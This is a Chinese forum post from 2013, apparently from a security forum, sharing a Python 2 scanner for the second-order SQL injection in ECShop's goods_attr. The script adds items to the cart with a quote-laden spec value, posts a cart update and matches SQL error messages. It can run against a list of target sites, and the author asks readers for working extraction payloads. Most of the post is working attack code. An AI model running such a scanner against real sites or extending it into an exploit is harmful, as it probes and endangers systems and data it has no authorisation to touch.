介于好久没法帖子了,看到ecshop的goods_attr和goods_attr_id两个二次注入漏洞 ,于是写了这个小工具,由于不会构造语句,只能写出判断漏洞是否存在的工具了,大家海涵,有能构造出语句的,联系我,我再完善一下,
完整代码如下:
#! /usr/bin/env python2.7 #coding=utf-8 #by 少校 QQ1006079161 写入2013年8月14号深夜 #ecshop的goods_attr和goods_attr_id两个二次注入漏洞 #参考[url]https://forum.90sec.org/viewthread.php?tid=6476&highlight=ecshop[/url] import re import sys import getopt import urllib import urllib2 import cookielib def make_order(arg): print u'n当前正在检测%s' % arg global mdbhack run = True mdbhack = 1 url = '%s/flow.php?step=add_to_cart' % arg while run and mdbhack<25:#为了效率期间只测试前25个id,可自行增加 data = '''goods={"quick":1,"spec":["163","163'"],"goods_id":%s,"number":"1","parent":0}''' % mdbhack cookiejar = cookielib.CookieJar() urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)) urllib2.install_opener(urlOpener) #使用isntall_opener后调用urlopen时会使用这个opener so is good try: httpres = urlOpener.open(url,data,timeout=5) html = httpres.read() order_ok = re.search('s1s',html) if order_ok: print u'[LOG] 自动完成订购订单!' goods_attr_sqlinjection(arg) run = False break else: print u'[LOG] 自动订购产品id%s失败!' % mdbhack mdbhack += 1 if mdbhack == 25 and run: print u'[LOG] 抱歉,前25个id的产品全部订购失败,请手动检测吧!' except Exception,e: print e run = False break def goods_attr_sqlinjection(arg): url = arg+'/flow.php' html = urllib2.urlopen(url).read() good_numbers = re.findall('''name="goods_number[(.*?)]"''',html)[0]#构造good_numbers if good_numbers: data = 'goods_number%5B'+str(good_numbers)+'''%5D=1&submit=%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5&step=update_cart''' request = urllib2.Request(url,data) httpres = urllib2.urlopen(request,timeout=10) html = httpres.read() if re.search('server error|report:Array|You have an error|your SQL syntax|the right syntax to use near',html): print u'[LOG] 恭喜您存在goods_attr注入漏洞!' else: print u'[LOG] 不存在此漏洞' def main(url,file_txt): if url and file_txt: printerror() sys.exit(1) if url: make_order(url.strip()) if file_txt: try: for url in open(file_txt,'r'): make_order(url.strip()) except Exception,e: print e sys.exit(1) def printerror(): print ''' ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. `+---------------------------^----------| `_,-------, [email]__1006079161@QQ.com______[/email]| / XXXXXX /`| / / XXXXXX / ` / / XXXXXX /______( / XXXXXX / / XXXXXX / (________( For example: `------' scan.py -u [url]http://www.mdbhack.com[/url] scan.py -f ecshop.txt ''' if __name__ == '__main__': url = None file_txt = None if len (sys.argv) == 3: try: opts, args = getopt.getopt (sys.argv[1:], "u:f:")#Assigning Parameters except: printerror() sys.exit(1) else: printerror() sys.exit(1) for opt,arg in opts:#Traversal if opt == '-u': url = arg elif opt == '-f': file_txt = arg main(url,file_txt)
作者:少校 90sec
评论 (0)